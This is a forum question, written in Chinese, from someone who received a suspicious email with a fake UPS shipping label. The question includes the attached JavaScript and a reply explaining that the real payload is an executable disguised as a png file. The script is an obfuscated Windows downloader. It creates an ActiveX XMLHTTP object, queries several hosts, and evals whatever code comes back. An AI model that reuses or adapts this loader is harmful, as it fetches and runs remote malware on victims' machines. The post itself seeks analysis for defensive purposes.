我得到了电子邮件今天有人给我发了一个UPS标签我没有打开它,因为我发现它可疑我想知道这是什么代码做,电子邮件与UPS标签脚本它做了什么?
感谢
var sder = "P";
var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder;
var m = "LZUaj4-qfCYW4M3kjDIgGL844Arvxk8a-hL2LmwUe1fG4_p62GL1yQkO5QZj62RgjWMzKm3mojn5OZRDSmV0C9O7RF_9Lw";
var x = new Array("site link", "site link", "site link", "site link", "site link");
var t4 = "ht"+"tp";
var mul = "qwadro";
var ter = "/";
for (var i=0; i<x.length; i++)
{ \t
\t var vDJmB = function(){
\t \t return new ActiveXObject(g2);
\t }();
\t var e = vDJmB;
\t try
\t {
\t \t e.open("G"+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m, false);
\t \t e.send();
\t \t var r = e.responseText;
\t \t if (r.length > 999+1 && r.indexOf(m) > -1)
\t \t {
\t \t \t eval(e.responseText.split(m).join(mul.substring(2,3)));
\t \t \t break;
\t \t };
\t }
\t catch(e)
\t {
\t };
};
我想知道这段代码做什么,有人试图从我那里获取信息?谢谢
主要问题它从执行它的用户得到什么,我也没有窗户。 –
@JunaidAbbasi真正的有效载荷位于下载的png文件中,该文件被重命名为exe。在安全的环境下,即firejail进行分析之前,你的猜测与我的一样好......如果我在分析中用葡萄酒之类的东西进一步分析,我会把它链接到这里。这些分析通常发布在我的商业网站上。 – Catwhisperer